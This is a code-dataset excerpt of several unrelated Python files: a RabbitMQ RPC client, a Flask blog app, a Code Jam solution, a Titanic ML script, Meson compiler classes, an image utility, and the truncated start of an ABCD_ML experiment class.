Co., LTD\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom synaps import flags\nfrom synaps.utils import strtime\nfrom synaps import log as logging\nfrom synaps.exception import RpcInvokeException\nimport uuid\n\nimport pika, json\n\nLOG = logging.getLogger(__name__)\nFLAGS = flags.FLAGS\n\nPUT_METRIC_DATA_MSG_ID = 0x0001\nPUT_METRIC_ALARM_MSG_ID = 0x0002\nDISABLE_ALARM_ACTIONS = 0x0003\nENABLE_ALARM_ACTIONS = 0x0004\nDELETE_ALARMS_MSG_ID = 0x0005\nSET_ALARM_STATE_MSG_ID = 0x0006\nCHECK_METRIC_ALARM_MSG_ID = 0x0010 \n\n\nclass RemoteProcedureCall(object):\n def __init__(self):\n self.connect()\n \n def connect(self):\n host = FLAGS.get('rabbit_host')\n port = FLAGS.get('rabbit_port')\n try:\n LOG.info(_(\"connecting to rabbit_host %s %d\") % (host, port))\n\n self.conn = pika.BlockingConnection(\n pika.ConnectionParameters(\n host=FLAGS.get('rabbit_host'),\n port=FLAGS.get('rabbit_port'),\n credentials=pika.PlainCredentials(\n FLAGS.get('rabbit_userid'),\n FLAGS.get('rabbit_password')\n ),\n virtual_host=FLAGS.get('rabbit_virtual_host'),\n )\n )\n \n self.channel = self.conn.channel()\n queue_args = {\"x-ha-policy\" : \"all\" }\n self.channel.queue_declare(queue='metric_queue', durable=True,\n arguments=queue_args)\n except Exception as e:\n raise RpcInvokeException()\n \n def send_msg(self, message_id, body):\n \"\"\"\n \n \n Args:\n message_id: int\n ex) PUT_METRIC_DATA_MSG_ID (0x0001)\n PUT_METRIC_ALARM_MSG_ID (0x0002)\n ...\n body: dict object (will be converted into json format)\n \n \"\"\"\n if type(message_id) is not int:\n raise RpcInvokeException()\n \n if not self.conn.is_open:\n self.connect()\n\n message_uuid = str(uuid.uuid4()) \n body.setdefault('message_id', message_id)\n body.setdefault('message_uuid', message_uuid)\n \n self.channel.basic_publish(\n exchange='', routing_key='metric_queue', body=json.dumps(body),\n properties=pika.BasicProperties(delivery_mode=2)\n )\n \n LOG.info(_(\"send_msg - id(%03d), %s\") % (message_id, message_uuid))\n LOG.debug(_(\"send_msg - body(%s)\") % str(body))\n","sub_path":"synaps-api/synaps/rpc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118433031","text":"import time\n\nfrom flask import Flask\nfrom flask_admin import Admin\nfrom flask_admin.contrib.sqla import ModelView\nfrom flask_babelex import Babel\n\nimport config\nfrom model import db\nfrom model.blog import Blog\nfrom model.reply import Reply\nfrom model.user import User\nfrom route import csrf\nfrom route.routes_index import main as index_routes\nfrom route.routes_detail import main as detail_routes\n\n\ndef formatted_time(input):\n \"\"\"\n Jinja2 filter\n :param input: timestamp\n :return: formatted time\n \"\"\"\n\n time_format = r'%Y/%m/%d'\n localtime = time.localtime(int(input))\n formatted = time.strftime(time_format, localtime)\n return formatted\n\n\ndef time_count(input):\n \"\"\"\n Jinja2 filter\n :param input: timestamp\n :return: generated current time minus input and formatted\n \"\"\"\n num = int(time.time())-input\n if num < 60:\n return '{} 秒'.format(num)\n elif 60 < num < 3600:\n return '{} 分钟'.format(num//60)\n elif 3600 < num < 86400:\n return '{} 小时'.format(num//3600)\n else:\n return '{} 天'.format(num//86400)\n\n\ndef current_app():\n \"\"\"\n Flask main enter\n :return: Flask app\n \"\"\"\n app = Flask(__name__)\n\n app.secret_key = config.secret_key\n\n app.config['WTF_CSRF_SECRET_KEY'] = config.csrf_key\n app.config['SQLALCHEMY_DATABASE_URI'] = config.db_url\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n app.add_template_filter(formatted_time)\n app.add_template_filter(time_count)\n\n db.init_app(app)\n csrf.init_app(app)\n\n register_routes(app)\n return app\n\n\ndef register_routes(app):\n \"\"\"\n Register routes and add prefix\n :param app: Flask app\n :return: Flask app\n \"\"\"\n app.register_blueprint(index_routes)\n app.register_blueprint(detail_routes, url_prefix='/blog')\n\n\nif __name__ == '__main__':\n app = current_app()\n\n app.config['TEMPLATE_AUTO_RELOAD'] = True\n app.jinja_env.auto_reload = True\n\n app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n # 本地化,admin后台中文\n babel = Babel(app)\n app.config['BABEL_DEFAULT_LOCALE'] = 'zh_CN'\n\n admin = Admin(app, name=u'管理后台', template_mode='bootstrap3')\n admin.add_view(ModelView(User, db.session))\n admin.add_view(ModelView(Blog, db.session))\n admin.add_view(ModelView(Reply, db.session))\n\n config = dict(\n host='localhost',\n port=3000,\n debug=True\n )\n\n app.run(**config)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60437745","text":"\ndef solve(string,n,z):\n if len(string) == 1 and string[0] == \"+\" :\n print(\"Case #\", z+1, \": \",n , sep = '');\n return n;\n if string[len(string)-1] == \"+\" :\n solve(string[0:len(string)-1],n,z);\n else :\n tempString = [];\n for j in string:\n tempString.append(j);\n for i in range(len(tempString)) :\n if tempString[i] == \"+\" :\n tempString[i] = \"-\";\n else :\n tempString[i] = \"+\";\n string = ''.join(tempString);\n \n solve(string,n+1,z);\n\t\t\ncases = int(input());\n\nfor i in range(cases) :\n string = input();\n if len(string) == 1 :\n \tif string[0] == \"-\" :\n \t\tprint(\"Case #\", i+1, \": 1\", sep = '');\n \telse :\n \t\tprint(\"Case #\", i+1, \": 0\", sep = '')\n \tcontinue;\n #Check if all values are same\n if string == \"-\" * len(string) :\n \tprint(\"Case #\", i+1, \": 1\", sep = '');\n \tcontinue;\n elif string == \"+\" * len(string) :\n \tprint(\"Case #\", i+1, \": 0\", sep = '');\n \tcontinue;\n #Check if all values except last are same\n if string[len(string)-1] == \"-\" and string[0:len(string)-2] == \"+\" * (len(string)-2) :\n \tprint(\"Case #\", i+1, \": 2\", sep = '');\n \tcontinue;\n elif string[len(string)-1] == \"+\" and string[0:len(string)-2] == \"-\" * (len(string)-2) :\n \tprint(\"Case #\", i+1, \": 1\", sep = '');\n \tcontinue;\n solve(string,0,i);\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_Marmik_Revenge Of PanCakes.py","file_name":"16_0_2_Marmik_Revenge Of PanCakes.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425817546","text":"# Import necessary libraries\nimport pandas as pd\nfrom sklearn import model_selection\nfrom model import TitanicModel\nfrom tensorflow import keras\nfrom keras.utils import to_categorical\n\ndef load_and_prep_data(data_path, isTrainingSet):\n\n # Load dataset\n X_train_orig = pd.read_csv(data_path)\n\n # View dataset\n print(X_train_orig.head())\n\n # Separate the Y i.e output from the training dataset only.\n Y_train_orig = None\n if isTrainingSet:\n Y_train_orig = X_train_orig['Survived']\n #print(Y_train_orig.head())\n # Drop unnecessary columns\n dropCols = ['PassengerId', 'Survived', 'Name', 'Ticket', 'Cabin']\n else:\n dropCols = ['PassengerId', 'Name', 'Ticket', 'Cabin']\n X_train = X_train_orig.drop(dropCols, axis=1)\n #print(X_train.head())\n #print(X_train.info())\n\n # Separate numerical and categorical features\n num_feat = X_train.select_dtypes('number').columns.values\n cat_feat = X_train.select_dtypes('object').columns.values\n X_num = X_train[num_feat]\n\n # Take age and category in range 1-3\n X_num.loc[ X_num['Fare'] <= 7.91, 'Fare'] = 0\n X_num.loc[(X_num['Fare'] > 7.91) & (X_num['Fare'] <= 14.454), 'Fare'] = 1\n X_num.loc[(X_num['Fare'] > 14.454) & (X_num['Fare'] <= 31), 'Fare'] = 2\n X_num.loc[ X_num['Fare'] > 31, 'Fare'] = 3\n #X_num['Fare'] = X_num['Fare'].astype(int)\n\n X_num.loc[ X_num['Age'] <= 16, 'Age'] = 0\n X_num.loc[(X_num['Age'] > 16) & (X_num['Age'] <= 32), 'Age'] = 1\n X_num.loc[(X_num['Age'] > 32) & (X_num['Age'] <= 48), 'Age'] = 2\n X_num.loc[(X_num['Age'] > 48) & (X_num['Age'] <= 64), 'Age'] = 3\n X_num.loc[ X_num['Age'] > 64, 'Age'] = 4\n #X_num['Age'] = X_num['Age'].astype(int)\n X_cat = X_train[cat_feat]\n\n # Data Augmentation\n \n\n # Normalize numeric features\n X_num_normalized = (X_num - X_num.mean()) / X_num.std()\n X_num_normalized = X_num_normalized.fillna(X_num_normalized.mean())\n\n #print(X_num_normalized.head())\n\n # Convert categorical features to one hot\n X_cat = pd.get_dummies(X_cat)\n #print(X_cat.head())\n\n # Concatenate X_num and X_concat\n X = pd.concat([X_num, X_cat], axis=1)\n print(X.head())\n\n Y = list()\n # Do the same for outputs Y\n if Y_train_orig is not None:\n Y = Y_train_orig.fillna(0)\n #print(Y.describe())\n\n return X,Y\n\ndef split_training_data(X, Y):\n X_train, X_test, Y_train, Y_test = model_selection.train_test_split(X, Y, random_state=0)\n return X_train, X_test, Y_train, Y_test\n\ndef main():\n relPath = 'C:/Users/himan/Documents/GitHub/Deep-Learning-Projects/Titanic - Machine Learning from Disaster/dataset'\n trainDataPath = relPath + '/train.csv'\n testDataPath = relPath + '/test.csv'\n \n print('Preparing Training Data')\n X, Y = load_and_prep_data(trainDataPath, True)\n print('Preparing unseen Test Data')\n X_unseen_test, _ = load_and_prep_data(testDataPath, False)\n\n #Split the train data into train and test data for your cross validation\n X_train, X_test, Y_train, Y_test = split_training_data(X,Y)\n\n model = TitanicModel()\n # Convert Y to one hot labels\n Y_train = to_categorical(Y_train)\n Y_test = to_categorical(Y_test)\n\n # Convert dataframe to numpy array\n X_train = X_train.values\n X_test = X_test.values\n \n print('Shape of training data ' + str(X_train.shape))\n print('Shape of training labels ' + str(Y_train.shape))\n \n # Reshape Y_train and Y_test to (N,1)\n #Y_train = Y_train.values.reshape(len(Y_train), 1)\n #Y_test = Y_test.values.reshape((len(Y_test), 1))\n\n print('Shape of test data ' + str(X_test.shape))\n print('Shape of test labels' + str(Y_test.shape))\n\n # Convert unseen test examples into np array\n X_unseen_test = X_unseen_test.values\n \n # Train the model\n trained_model = model.train_with_keras_model(X_train, Y_train, X_test, Y_test, 100, 512)\n #trained_model = model.train_params(X_train.T, Y_train, X_test.T, Y_test, 0.003, 300, 512, True)\n \n # Evaluation on test data\n #pred = trained_model.predict(X_unseen_test)\n #print(pred)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Titanic - Machine Learning from Disaster/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37285184","text":"import pandas as pd\nimport math\nimport numpy \n\nfile_to_read = input(\"type the file you want to read here: \")\n\nread = pd.read_csv(file_to_read)\nangle_calced = numpy.arctan2(read[\"Tangent Y\"], read[\"Tangent X\"])\n\ncombined_output = []\nfor index in range(len(read[\"X\"])):\n x_gen = ((read[\"X\"][index]) - (read[\"X\"][0]))\n y_gen = ((read[\"Y\"][index]) - (read[\"Y\"][0]))\n angle_gen = numpy.rad2deg(angle_calced[index])\n\n x_val = numpy.round(x_gen, 3)\n y_val = numpy.round(y_gen, 3)\n angle = numpy.round(angle_gen, 3)\n\n combined_output.append((x_val, y_val, angle))\n\n print(\"new Pose2d(\" + str(x_val) + \"d, \" + str(y_val) + \"d, \" + \"Rotation2d.fromDegrees(\" + str(angle) + \"d\" \")),\")\n\nnumpy.set_printoptions(suppress=True, precision=3)\n# print(\"points relative to 0: \")\n# print(numpy.array(combined_output))\n","sub_path":"scripts/pointgen.py","file_name":"pointgen.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645055902","text":"# Copyright 2012-2017 The Meson development team\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os.path\n\nfrom .. import mlog\nfrom .. import coredata\nfrom ..mesonlib import version_compare\n\nfrom .c import CCompiler, VisualStudioCCompiler\nfrom .compilers import (\n GCC_MINGW,\n gnu_winlibs,\n msvc_winlibs,\n ClangCompiler,\n GnuCompiler,\n IntelCompiler,\n)\n\nclass CPPCompiler(CCompiler):\n def __init__(self, exelist, version, is_cross, exe_wrap, **kwargs):\n # If a child ObjCPP class has already set it, don't set it ourselves\n if not hasattr(self, 'language'):\n self.language = 'cpp'\n CCompiler.__init__(self, exelist, version, is_cross, exe_wrap, **kwargs)\n\n def get_display_language(self):\n return 'C++'\n\n def get_no_stdinc_args(self):\n return ['-nostdinc++']\n\n def sanity_check(self, work_dir, environment):\n code = 'class breakCCompiler;int main(int argc, char **argv) { return 0; }\\n'\n return self.sanity_check_impl(work_dir, environment, 'sanitycheckcpp.cc', code)\n\n def get_compiler_check_args(self):\n # -fpermissive allows non-conforming code to compile which is necessary\n # for many C++ checks. Particularly, the has_header_symbol check is\n # too strict without this and always fails.\n return super().get_compiler_check_args() + ['-fpermissive']\n\n def has_header_symbol(self, hname, symbol, prefix, env, extra_args=None, dependencies=None):\n # Check if it's a C-like symbol\n if super().has_header_symbol(hname, symbol, prefix, env, extra_args, dependencies):\n return True\n # Check if it's a class or a template\n if extra_args is None:\n extra_args = []\n fargs = {'prefix': prefix, 'header': hname, 'symbol': symbol}\n t = '''{prefix}\n #include <{header}>\n using {symbol};\n int main () {{ return 0; }}'''\n return self.compiles(t.format(**fargs), env, extra_args, dependencies)\n\n\nclass ClangCPPCompiler(ClangCompiler, CPPCompiler):\n def __init__(self, exelist, version, cltype, is_cross, exe_wrapper=None, **kwargs):\n CPPCompiler.__init__(self, exelist, version, is_cross, exe_wrapper, **kwargs)\n ClangCompiler.__init__(self, cltype)\n default_warn_args = ['-Wall', '-Winvalid-pch', '-Wnon-virtual-dtor']\n self.warn_args = {'1': default_warn_args,\n '2': default_warn_args + ['-Wextra'],\n '3': default_warn_args + ['-Wextra', '-Wpedantic']}\n\n def get_options(self):\n return {'cpp_std': coredata.UserComboOption('cpp_std', 'C++ language standard to use',\n ['none', 'c++98', 'c++03', 'c++11', 'c++14', 'c++17', 'c++1z',\n 'gnu++11', 'gnu++14', 'gnu++17', 'gnu++1z'],\n 'none')}\n\n def get_option_compile_args(self, options):\n args = []\n std = options['cpp_std']\n if std.value != 'none':\n args.append('-std=' + std.value)\n return args\n\n def get_option_link_args(self, options):\n return []\n\n\nclass GnuCPPCompiler(GnuCompiler, CPPCompiler):\n def __init__(self, exelist, version, gcc_type, is_cross, exe_wrap, defines, **kwargs):\n CPPCompiler.__init__(self, exelist, version, is_cross, exe_wrap, **kwargs)\n GnuCompiler.__init__(self, gcc_type, defines)\n default_warn_args = ['-Wall', '-Winvalid-pch', '-Wnon-virtual-dtor']\n self.warn_args = {'1': default_warn_args,\n '2': default_warn_args + ['-Wextra'],\n '3': default_warn_args + ['-Wextra', '-Wpedantic']}\n\n def get_options(self):\n opts = {'cpp_std': coredata.UserComboOption('cpp_std', 'C++ language standard to use',\n ['none', 'c++98', 'c++03', 'c++11', 'c++14', 'c++17', 'c++1z',\n 'gnu++03', 'gnu++11', 'gnu++14', 'gnu++17', 'gnu++1z'],\n 'none'),\n 'cpp_debugstl': coredata.UserBooleanOption('cpp_debugstl',\n 'STL debug mode',\n False)}\n if self.gcc_type == GCC_MINGW:\n opts.update({\n 'cpp_winlibs': coredata.UserArrayOption('cpp_winlibs', 'Standard Win libraries to link against',\n gnu_winlibs), })\n return opts\n\n def get_option_compile_args(self, options):\n args = []\n std = options['cpp_std']\n if std.value != 'none':\n args.append('-std=' + std.value)\n if options['cpp_debugstl'].value:\n args.append('-D_GLIBCXX_DEBUG=1')\n return args\n\n def get_option_link_args(self, options):\n if self.gcc_type == GCC_MINGW:\n return options['cpp_winlibs'].value[:]\n return []\n\n def get_pch_use_args(self, pch_dir, header):\n return ['-fpch-preprocess', '-include', os.path.basename(header)]\n\n\nclass IntelCPPCompiler(IntelCompiler, CPPCompiler):\n def __init__(self, exelist, version, icc_type, is_cross, exe_wrap, **kwargs):\n CPPCompiler.__init__(self, exelist, version, is_cross, exe_wrap, **kwargs)\n IntelCompiler.__init__(self, icc_type)\n self.lang_header = 'c++-header'\n default_warn_args = ['-Wall', '-w3', '-diag-disable:remark',\n '-Wpch-messages', '-Wnon-virtual-dtor']\n self.warn_args = {'1': default_warn_args,\n '2': default_warn_args + ['-Wextra'],\n '3': default_warn_args + ['-Wextra', '-Wpedantic']}\n\n def get_options(self):\n c_stds = []\n g_stds = ['gnu++98']\n if version_compare(self.version, '>=15.0.0'):\n c_stds += ['c++11', 'c++14']\n g_stds += ['gnu++11']\n if version_compare(self.version, '>=16.0.0'):\n c_stds += ['c++17']\n if version_compare(self.version, '>=17.0.0'):\n g_stds += ['gnu++14']\n opts = {'cpp_std': coredata.UserComboOption('cpp_std', 'C++ language standard to use',\n ['none'] + c_stds + g_stds,\n 'none'),\n 'cpp_debugstl': coredata.UserBooleanOption('cpp_debugstl',\n 'STL debug mode',\n False)}\n return opts\n\n def get_option_compile_args(self, options):\n args = []\n std = options['cpp_std']\n if std.value != 'none':\n args.append('-std=' + std.value)\n if options['cpp_debugstl'].value:\n args.append('-D_GLIBCXX_DEBUG=1')\n return args\n\n def get_option_link_args(self, options):\n return []\n\n def has_multi_arguments(self, args, env):\n for arg in args:\n if arg.startswith('-Wl,'):\n mlog.warning('''{} looks like a linker argument, but has_argument\nand other similar methods only support checking compiler arguments.\nUsing them to check linker arguments are never supported, and results\nare likely to be wrong regardless of the compiler you are using.\n'''.format(arg))\n return super().has_multi_arguments(args + ['-diag-error', '10006'], env)\n\n\nclass VisualStudioCPPCompiler(VisualStudioCCompiler, CPPCompiler):\n def __init__(self, exelist, version, is_cross, exe_wrap, is_64):\n self.language = 'cpp'\n VisualStudioCCompiler.__init__(self, exelist, version, is_cross, exe_wrap, is_64)\n self.base_options = ['b_pch'] # FIXME add lto, pgo and the like\n\n def get_options(self):\n return {'cpp_eh': coredata.UserComboOption('cpp_eh',\n 'C++ exception handling type.',\n ['none', 'a', 's', 'sc'],\n 'sc'),\n 'cpp_winlibs': coredata.UserArrayOption('cpp_winlibs',\n 'Windows libs to link against.',\n msvc_winlibs)\n }\n\n def get_option_compile_args(self, options):\n args = []\n std = options['cpp_eh']\n if std.value != 'none':\n args.append('/EH' + std.value)\n return args\n\n def get_option_link_args(self, options):\n return options['cpp_winlibs'].value[:]\n\n def get_compiler_check_args(self):\n # Visual Studio C++ compiler doesn't support -fpermissive,\n # so just use the plain C args.\n return super(VisualStudioCCompiler, self).get_compiler_check_args()\n","sub_path":"mesonbuild/compilers/cpp.py","file_name":"cpp.py","file_ext":"py","file_size_in_byte":9436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71759912","text":"from PIL import Image\nimport os.path, os\n\nimage_ctype= {'png': \"image/png\",\n 'jpg': \"image/jpeg\",\n 'jpeg': \"image/jpeg\"}\n\ndef save_image(dir, sha1, ext, data):\n fname = \"{0}.{1}\".format(sha1, ext)\n fout = open(os.path.join(dir, fname), 'wb')\n fout.write(data)\n fout.close()\n return fname\n\ndef move_image(fr, to):\n os.rename(fr, to)\n\ndef save_thumbnail(in_path, dir, sha1, prefix, max_width=1024, max_height=1024):\n size = (max_width, max_height)\n im = Image.open(in_path)\n im.thumbnail(size, Image.ANTIALIAS)\n fname = \"{0}_{1}.jpg\".format(prefix, sha1)\n im.save(os.path.join(dir, fname), \"JPEG\", quality=95)\n return fname\n\ndef get_image_size(path):\n im = Image.open(path)\n size = im.size\n return size","sub_path":"KPDB/src/imageutil.py","file_name":"imageutil.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"334449693","text":"\"\"\"\nABCD_ML.py\n====================================\nThe main project class.\n\"\"\"\nimport pandas as pd\nimport shutil\nimport os\nimport pickle as pkl\n\nfrom ..helpers.Docstring_Helpers import get_new_docstring\n# from ..helpers.Params_Classes import ML_Params\nfrom ..helpers.CV import CV\n\n\ndef Load(loc, exp_name='default', log_dr='default', existing_log='default',\n verbose='default', notebook='default', random_state='default'):\n '''\n This function is designed to load in a saved previously created\n ABCD_ML object.\n\n See :func:`Save ` for saving an object.\n See :func:`Init ` for the\n rest of changable param descriptions, e.g., log_dr, existing_log, ect...\n\n Parameters\n ----------\n loc : str or Path\n\n A path/str to a saved ABCD_ML object,\n (One saved with :func:`Save `), then that object will be\n loaded. Notably, if any additional params are passed along\n with it, e.g., exp_name, notebook, ect... they will override\n the saved values with the newly passed values.\n If left as 'default', all params will be set to the loaded value,\n though see the warning below.\n\n .. WARNING::\n The exp_name or log_dr may need to be changed, especially\n in the case where the object is being loaded in a new\n location or enviroment from where the original was created,\n as it will by default try to create logs with the saved path\n information as the original.\n\n You can only change exp_name, log_dr, existing_log, verbose,\n notebook and random_state when loading a new object, for the\n remaining params, even if a value is passed, it will not be\n applied. If the user really wishes to change one of these params,\n they can change it manually via self.name_of_param = whatever.\n '''\n\n with open(loc, 'rb') as f:\n ML = pkl.load(f)\n\n if exp_name != 'default':\n ML.exp_name = exp_name\n if log_dr != 'default':\n ML.log_dr = log_dr\n if existing_log != 'default':\n ML.existing_log = existing_log\n if verbose != 'default':\n ML.verbose = verbose\n\n ML._init_logs()\n\n if notebook != 'default':\n ML.notebook = notebook\n if random_state != 'default':\n ML.random_state = random_state\n\n ML._print('ABCD_ML object loaded from save!')\n return ML\n\n\nclass ABCD_ML():\n\n def __init__(self, exp_name='My_ML_Exp', log_dr='', existing_log='append',\n verbose=True, notebook=True,\n use_abcd_subject_ids=False,\n low_memory_mode=False, strat_u_name='_Strat',\n random_state=534, n_jobs=1, dpi=100, mp_context='spawn'):\n '''Main class used within ABCD_ML for interfacing with Data Loading\n and Modeling / Other funcationality.\n\n Parameters\n ----------\n exp_name : str, optional\n The name of this experimental run,\n used explicitly in saving logs, and figures, where the passed\n `exp_name` is used as the name of the log folder.\n If log_dr is not set to None,\n (if not None then saves logs and figures)\n then a folder is created within the log dr\n with the exp_name.\n\n ::\n\n default = 'My_ML_Exp'\n\n log_dr : str, Path or None, optional\n The directory in which to store logs...\n If set to None, then will not save any logs!\n If set to empty str, will save in the current dr.\n\n ::\n\n default = ''\n\n existing_log : {'new', 'append', 'overwrite'}, optional\n This parameter dictates different choices for when\n an a folder with exp_name already exists in the specified\n log_dr.\n\n These choices are:\n\n - 'new'\n If the log folder already exists, then\n just increment `exp_name` until a free name is found,\n and use that as the log folder / `exp_name`.\n\n - 'append'\n If existing_log is 'append' then log entries\n and new figures will be added to the existing folder.\n\n - 'overwrite'\n If existing_log is 'overwrite', then the existing\n log folder with the same exp_name will be cleared\n upon __init__.\n\n ::\n\n default = 'append'\n\n verbose: bool, optional\n If `verbose` is set to True, the ABCD_ML object\n will print output, diagnostic and more general, directly\n to std out. If set to False, no output will be printed, though\n output will still be recorded within the logs assuming log_dr is not None.\n\n ::\n\n default = True\n\n notebook : bool, optional\n If True, then assumes the user is running\n the code in an interactive jupyter notebook. \n In this case, certain features will either be enabled or disabled,\n e.g., type of progress bar.\n\n ::\n\n default = Trues\n\n use_abcd_subject_ids : bool, optional\n Flag to determine the usage of ABCD speficic 'default'\n subject id behavior.\n If set to True, this will convert input NDAR subject ids\n into upper case, with prepended NDAR - type format.\n If set to False, then all input subject names must be entered\n explicitly the same, no preprocessing will be done on them.\n\n ::\n\n default = False\n\n low_memory_mode : bool, optional\n This parameter dictates behavior around loading in data,\n specifically,\n If set to True, individual dataframes self.data, self.covars ect...\n will be deleted from memory as soon as modeling begins.\n This parameter also controls the pandas read_csv behavior,\n which also has a low_memory flag.\n\n ::\n\n default = False\n\n strat_u_name : str, optional\n A unique str identifier to be appended to every loaded\n strat value (to keep them seperate from covars and data).\n\n You should only need to change or ever worry about this in\n the case that one of your input variables happens to have the\n default value of '_Strat' in it...\n\n ::\n\n default = '_Strat'\n\n random_state : int, RandomState instance or None, optional\n The default random state, either as int for a specific seed,\n or if None then the random seed is set by np.random.\n This parameters if set will be the default random_state class-wide,\n so any place random_state is left to default, unless a different\n default is set (e.g. default load value or default ML value) this\n random state will be used.\n\n ::\n\n default = 534\n\n n_jobs : int, optional\n The default number of jobs / processors to use (if avaliable) where\n ever avaliable class-wide across ABCD_ML.\n\n ::\n\n default = 1\n\n dpi : int, optional\n The default dpi in which to save any automatically saved fiugres\n with.\n Where this parameter can also be set to specific values\n for specific plots.\n\n ::\n\n default = 1\n\n mp_context : {None, 'fork', 'spawn'}, optional\n When a hyper-parameter search is launched, there are different\n ways through python that the multi-processing can be launched\n (assuming n_jobs > 1). Occassionally some choices can lead to\n odd errors.\n\n ::\n\n default = 'spawn'\n '''\n # Load logging class params\n self.exp_name = exp_name\n self.log_dr = log_dr\n self.existing_log = existing_log\n self.verbose = verbose\n\n self._init_logs()\n\n self._print('exp_name =', self.exp_name)\n self._print('log_dr =', self.log_dr)\n self._print('existing_log =', self.existing_log)\n self._print('verbose =', self.verbose)\n self._print('exp log dr setup at:', self.exp_log_dr)\n self._print('log file at:', self.log_file)\n\n # Set rest of class params\n self.notebook = notebook\n self.use_abcd_subject_ids = use_abcd_subject_ids\n self.low_memory_mode = low_memory_mode\n self.strat_u_name = strat_u_name\n self.random_state = random_state\n self.n_jobs = n_jobs\n self.dpi = dpi\n self.mp_context = mp_context\n\n self._print('Default params set:')\n self._print('notebook =', self.notebook)\n self._print('use_abcd_subject_ids =', self.use_abcd_subject_ids)\n self._print('low memory mode =', self.low_memory_mode)\n self._print('strat_u_name =', self.strat_u_name)\n self._print('random state =', self.random_state)\n self._print('n_jobs =', self.n_jobs)\n self._print('dpi =', self.dpi)\n self._print('mp_context =', self.mp_context)\n\n # Initialze various variables\n self.name_map, self.exclusions, self.inclusions = {}, set(), set()\n self.data, self.covars = pd.DataFrame(), pd.DataFrame()\n self.targets, self.strat = pd.DataFrame(), pd.DataFrame()\n\n # Dict objects to hold encoders\n self.covars_encoders = {}\n self.targets_encoders = {}\n self.strat_encoders = {}\n\n # Class values to be set later\n self.all_data = None\n self.targets_keys = []\n\n # Stores the gloabl train/test split\n self.train_subjects, self.test_subjects = None, None\n\n # CV by default is just random splits\n self.CV = CV()\n\n # Store default dicts as init empty\n self.default_load_params, self.default_ML_verbosity = {}, {}\n\n # Scores are saved after each eval or test run\n self.eval_scores, self.test_scores = {}, {}\n\n self.subject_id = 'src_subject_id'\n\n self.last_run_name = None\n self.last_subjects_to_use_names = None\n\n self.file_mapping = {}\n self.data_file_keys = []\n\n self._print('ABCD_ML object initialized')\n\n def Save(self, loc, low_memory=False):\n '''This class method is used to save an existing ABCD_ML\n object for further use.\n\n Parameters\n ----------\n loc : str or Path\n The location in which the pickle of the ABCD_ML object\n should be saved! This is the same loc which should be\n passed to :func:`Load ` in order to\n re-load the object.\n\n low_memory : bool, optional\n If this parameter is set to True, then self.data,\n self.targets, self.covars, self.strat will be deleted\n before saving. The assumption for the param to be used is\n that self.all_data has already been created, and therefore\n the individual dataframes with data, covars ect... can safely\n be deleted as the user will not need to work with them directly\n any more.\n\n In addition, self.Model_Pipeline (which contains\n information about the last run Evaluate or Test call) will be\n deleted.\n\n ::\n\n default = False\n '''\n\n if low_memory:\n self.data, self.covars = pd.DataFrame(), pd.DataFrame()\n self.targets, self.strat = pd.DataFrame(), pd.DataFrame()\n\n try:\n del self.Model_Pipeline\n except AttributeError:\n pass\n\n with open(loc, 'wb') as f:\n pkl.dump(self, f)\n\n def _init_logs(self):\n\n if self.log_dr is not None:\n\n if self.log_dr == '':\n self.log_dr = os.getcwd()\n\n # Ensure log_dr exists, if not make it\n os.makedirs(self.log_dr, exist_ok=True)\n\n # Get exp_log_dr name\n self.exp_log_dr = os.path.join(self.log_dr, self.exp_name)\n\n if os.path.isdir(self.exp_log_dr):\n\n if self.existing_log == 'new':\n\n cnt = 1\n while os.path.isdir(self.exp_log_dr +\n '(' + str(cnt) + ')'):\n cnt += 1\n\n self.exp_log_dr += '(' + str(cnt) + ')'\n\n # If overwrite, delete everything, then make new blank\n elif self.existing_log == 'overwrite':\n shutil.rmtree(self.exp_log_dr)\n\n # Make the new dr\n if self.existing_log != 'append':\n os.mkdir(self.exp_log_dr)\n\n # If the dr doesn't already exist, regardless of existing log\n # Just make new dr.\n else:\n os.mkdir(self.exp_log_dr)\n\n # Make the log file if not already made.\n self.log_file = os.path.join(self.exp_log_dr, 'logs.txt')\n\n else:\n self.exp_log_dr = None\n self.log_file = None\n\n def _print(self, *args, **kwargs):\n '''Overriding the print function to allow for\n customizable verbosity within class methods. Will also\n take care of logging behavior.\n\n Parameters\n ----------\n args\n Anything that would be passed to default python print\n '''\n\n dont_print = kwargs.pop('dont_print', False)\n\n if self.verbose and not dont_print:\n print(*args, **kwargs)\n\n if self.log_file is not None:\n log = open(self.log_file, 'a')\n print(*args, 